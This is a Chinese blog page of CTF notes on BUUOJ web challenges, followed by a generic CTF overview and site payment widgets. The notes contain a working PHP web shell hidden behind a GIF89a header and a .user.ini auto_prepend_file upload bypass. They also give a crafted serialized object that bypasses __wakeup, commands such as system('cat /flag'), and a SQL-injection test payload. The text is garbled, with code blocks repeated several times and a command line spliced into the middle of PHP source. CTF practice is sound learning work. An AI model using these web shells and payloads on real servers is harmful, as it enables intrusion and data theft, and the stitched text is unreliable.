CTF做题笔记9

[ACTF2020 新生赛]BackupFile

$ python3 dirsearch.py -e php,txt,zip,html -u http://d71ec916-0f16-4fea-b5ae-f1d1251aae5e.node4.buuoj.cn:81/  -t 40 --exclude-status 403,401
[19:57:33] 200 -  347B  - /index.php.bak
?index.php?key=123

[极客大挑战 2019]PHP

/www.zip
<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
## [ACTF2020 新生赛]BackupFile
```bash
$ python3 dirsearch.py -e php,txt,zip,html -u http://d71ec916-0f16-4fea-b5ae-f1d1251aae5e.node4.buuoj.cn:81/  -t 40 --exclude-status 403,401
[19:57:33] 200 -  347B  - /index.php.bak
?index.php?key=123

[极客大挑战 2019]PHP

/www.zip
<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>
<?php
include 'flag.php';
index.php?cmd=system('cat /flag');

error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>
$a= new Name();
$a -> username = 'admin';
$a -> password = '100';
echo serialize($a);
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

[SUCTF 2019]CheckIn

// filename="3.jpg"
GIF89a
<script language="php">eval($_POST['a']);</script>
// filename=".user.ini"
GIF89a
auto_prepend_file=3.jpg
index.php?cmd=var_dump(scandir("/"));
index.php?cmd=system('cat /flag');
index.php?cmd=system('cat /flag');

error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>
$a= new Name();
$a -> username = 'admin';
$a -> password = '100';
echo serialize($a);
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

[SUCTF 2019]CheckIn

// filename="3.jpg"
GIF89a
<script language="php">eval($_POST['a']);</script>
// filename=".user.ini"
GIF89a
auto_prepend_file=3.jpg
index.php?cmd=var_dump(scandir("/"));
index.php?cmd=system('cat /flag');
### 关于CTF竞赛的笔记与资料 #### CTF竞赛概述 CTF(Capture The Flag)是一种流行的网络安全竞赛形式,其目标是通过解决各种技术挑战来捕获旗帜[^1]。这种比赛通常分为三种主要赛制:解题模式(Jeopardy)、攻防模式(Attack-Defense),以及混合模式(Mix)。其中,混合模式结合了解题和攻防的特点,在比赛中既可以通过解题获得初始分数,又可以在后续阶段通过攻击其他团队或防御自己的服务来进行动态得分调整[^2]。 #### 题型分类 CTF竞赛中的题目涵盖了多个领域,常见的大类包括但不限于Web安全、逆向工程、密码学、二进制漏洞利用、取证分析等。每种类型的题目都旨在测试选手在特定方向上的技能水平。例如,在Web安全方面,SQL注入和文件上传漏洞是非常基础但也极为重要的知识点之一[^3]。 #### 学习资源推荐 对于初学者来说,可以从以下几个方面入手准备CTF竞赛: - **官方平台**:访问像CTFtime这样的网站可以帮助跟踪全球范围内的赛事信息及其时间安排。 - **在线教程与文档**:网络上有大量关于如何参与并成功完成不同类型CTF挑战的文章和视频指南。这些材料往往由经验丰富的玩家编写,并分享他们解决问题的心得体会。 - **实践练习环境**:除了理论学习外,实际动手操作同样重要。可以尝试参加一些公开训练营或者使用专门设计用于教学目的虚拟机镜像进行模拟演练。 以下是几个具体的学习建议: ```python import requests def check_sql_injection(url, payload): response = requests.get(f"{url}?id={payload}") if "error" in response.text.lower(): return True return False # Example usage of the function to test SQL injection vulnerability. test_url = &#39;http://example.com/vulnerable-page&#39; injection_payload = "&#39; OR &#39;1&#39;=&#39;1" if check_sql_injection(test_url, injection_payload): print("Potential SQL Injection Vulnerability Found!") else: print("No obvious vulnerabilities detected.") ``` 上述代码片段展示了一个简单的Python脚本用来检测是否存在基本形式的SQL注入风险。这只是一个非常初级的例子,在真实环境中还需要考虑更多复杂情况和技术细节。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值